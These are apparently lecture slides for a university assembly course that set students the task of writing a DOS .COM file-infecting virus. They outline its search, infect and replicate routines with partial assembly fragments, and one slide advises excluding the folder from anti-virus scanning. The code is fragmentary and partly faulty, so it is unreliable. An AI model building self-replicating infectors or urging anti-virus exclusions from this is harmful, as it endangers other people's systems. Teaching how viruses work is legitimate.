Assignment 4 Introduction

23  Download (0)

Full text


Assignment 4 Introduction

Assembly TA Wei-Yen Day


Computer Virus Basic

• A program attaches itself to another program

• Reproduces itself

• Executed later and create more copies

– 1.COM-> 2.COM 3.COM …

• It can certainly dig into your computer and do things you don’t want


Structure of Virus

• 2 basic routine!

– Search

– Copy itself

• More routine are a bit more complex

– Anti-detection – Anti-anti-virus


Virus Classification

• According to the types of programs they infect

– They may infect COM, EXE, or SYS files

• Note that a virus can be written to infect any kind of code

– C, Basic, a batch file, a Paradox or Dbase program


COM File Structure

• When one enters the name of program,

– DOS begins looking for COM, EXE, and BAT

• COM files are much simpler

– They have predefined segment format

– EXE files’ format are defined by programmer

– COM file is a direct binary image of what should be put into memory and executed by CPU


Assignment 4: Justin Virus



• Infect all .COM programs under the same folder and print some

mischievous lines




Virus Symbol

• Retain 5 bytes

– 3 bytes for jmp

– 2 bytes for mark of virus

• Infect a ?? program when the virus is executed

– nop – nop – nop – nop – nop


More About Virus


Checking Memory

• Compute the size from normal program to


• Actually program size

– We call it “si”

– pop si ;si is p1+p2

– sub si, offset here ;then si is p2

• All the memory address about virus should add “si”


Recover Original Program

• Due to the first execution, we should add 5 nop to allocate space (see p.7)

• Recover original program to memory (P1)

– mov ax, word ptr ds:FIRST_5_BYTE[si]

– mov ds:[100h], ax

– mov ax, word ptr ds:FIRST_5_BYTE[si+2]

– mov ds:[100h+2], ax

– mov al, word ptr ds:FIRST_5_BYTE[si+4]

– mov ds:[100h+4], al


Write Back P1


Print Mischievous Word

• Print some mischievous words

• When the infected file is executed, it would print the words virus produced first

• Infect others


Search Next File(1)


– mov dx,OFFSET COM_MASK ;search for COM files – mov ah,4EH ;DOS find first file function – xor cx,cx ;CX holds all file attributes


– int 21h

– jc FIND_EXIT ;Exit if no files found – call FILE_OK ;file OK to infect?

– jc FIND_NEXT ;nope, look for another


Search Next File (2)


– ret ;else return with z set


– mov ah,4FH ;DOS find next file function – jmp FIND_LOOP ;Try finding another file



– Check if the virus pattern exist


File OK, Infect It

• Back up the first 5 bytes from original program

• Copy virus itself to the program

• Move the pointer to head, and write first 5 bytes

– Write v1

– 3 bytes are jmp

– 2 bytes are pattern

• Infect next file


The Infecting Mission is Done!

• Let’s take a over view again:

• 1. Check Memory (store p2 size)

• 2. Recover original program

• 3. Print Lines

• 4. Search File to Infect

• 5. Infect it

• 6. Loop 3. 4.

• 7. If no file cab be infected, then the mission completed


Procedure of Justin




Assignment 4 Note

• The .COM files (files your virus must infect) is here

• When you compile your code to produce a

virus, the anti-virus software in your computer might alert

– Try to set your anti-virus software to not detect the folder your virus is in


Checking Scenario

• The following is the judgment of assignment 4:

– If your virus can infect a .COM file (copy itself to attach another), you can get basic score

– If your virus can infect all .COM files under the same folder, you can get a better score

– If your virus can infect all .COM files under the same folder, and when you open the infected file, it infects all other files, you get a nice score

• If your virus can do all of above, and can avoid infecting files repeatedly, you do a good job!

– If your virus crash my computer, I would …


Now it’s your turn!

• Don’t just copy my code, think about it at first

• Actually it’s a simple virus, and it’s an easy work

• If you have any problem, google it! XD

• You can also discuss with me for sure

• Good luck to you guys!




Related subjects :